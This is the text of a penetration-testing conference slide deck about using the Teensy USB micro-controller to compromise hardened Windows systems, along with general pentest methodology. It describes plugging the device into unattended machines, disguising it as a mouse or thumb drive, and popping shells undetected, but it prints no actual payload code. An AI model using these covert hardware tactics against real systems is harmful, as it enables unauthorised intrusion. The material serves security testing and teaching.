MERE PAAS TEENSY HAIORCOMPROMISING A HIGHLY SECUREENVIRONMENT PART 2 Nikhil Mittal (SamratAshok)
ABOUT ME SamratAshok Twitter - @nikhil_mitt Penetration Tester with PwC India I am interested in Offensive Information Security, new attack vectors and methodologies to pwn systems. Creator of Kautilya and Maareech Previous Talks Ultimate Pen Testing: Compromising a highly secure environment Clubhack’10 Here are your Keystrokes Hackfest’11 Upcoming Talks Kautilya: Teensy beyond shell Blackhat Abu Dhabi’11
OVERVIEW Why the Title? Current State of Pentesting Questions being raised to us The answer to the questions What’s done What we will do Limitations Future Conclusion
WHY THE TITLE? What I Told to the ClubHack team: I talked about compromising a highly secure environment last year, let’s continue with the pwnage!! Thanks to the team for buying that and allowing me to speak. The real reason:
A TYPICAL PEN TEST SCENARIO A client engagement comes with IP addresses. We need to complete the assignment in very restrictive time frame. Pressure is on us to deliver a “good” report with some high severity findings. (That “High” return inside a red colored box)
CURRENT STATE OF PENTESTING Vuln Exploit Report Scan
This is a best case scenario. Only lucky ones find that. Generally legacy Enterprise Applications or Business Critical applications are not upgraded. There is almost no fun doing it that way.
SOME OF US DO IT BETTER Enum Scan Exploit Report
SOME OF US DO IT EVEN BETTEREnum Post + Scan Exploit Report Exp Intel
WHY DO WE NEED TO EXPLOIT? To gain access to the systems. This shows the real threat to clients that we can actually make an impact on their business. No more “so-what” We can create reports with “High” Severity findings. <Audience> <Audience>
WHAT DO WE EXPLOIT? Memory Corruption bugs. Server side Client Side Humans Mis-configurations Design Problems <Audience> <Audience>
QUESTIONS BEING RAISED TO US Many times we get some vulnerabilities but can’t exploit. No public exploits available. Not allowed on the system. Countermeasure blocking it. Exploit completed but no session was generated :P Kya hai tumhare paas?
QUESTIONS BEING RAISED TO US Hardened Systems Patches in place Countermeasures blocking scans and exploits Security incident monitoring and blocking Kya hai tumhare paas?
QUESTIONS BEING RAISED TO US Just a bad day. Exploit completed but no session was generated :P Kya hai tumhare paas?
ALTERNATIVES Open file shares. Sticky slips. Social Engineering attacks. Man In The Middle (many types) SMB Relay <Audience> <Audience>
THE ANSWER TO THE QUESTIONSTEENSY A USB Micro-controller device. We will use Teensy ++ which is a newer version of Teensy. Available for $24 from pjrc.com Mere paas Teensy hai
USING TEENSY Find an unattended system and insert the teensy device in USB port. Fool your victim by disguising it as a mouse, USB toy, Thumb drive etc. Generally Teensy needs just a minute to complete the job. You can program it according to your needs. Undetected and unblocked, Teensy works great for popping shells.
WHAT’S DONE Arduino-Based attack vector in Social Engineering Toolkit by David Kennedy Contains some really awesome payloads. Almost all payloads are for popping shells.
WHAT WE WILL DO Teensy can be used for much more than popping shells. It can be used to perform pre and post exploitation. We will have a detailed look at some of these payloads and will understand how to create payloads as per our needs.
DESCRIPTION OF PAYLOADS More for Windows as desktops are generally based on Windows. Payloads vary from one line commands to powerful scripts. If you know powershell scripting, payloads will make more sense and will be easier to customize.
LIMITATIONS Limited storage in Teensy. Resolved if you attach a SD card with Teensy. Inability to “read” from the system. You have to assume the responses of victim OS and there is only one way traffic.
FUTURE Kautilya Improvement in current payloads. New payloads for non-traditional shells. Dropping executables using additional storage (already done).
CONCLUSION If used wisely Teensy can be used as a complete penetration testing device though with its own limitations. It’s a cheap device so use it. Please use Kautilya and give feedback after it is released. Mere paas Teensy hai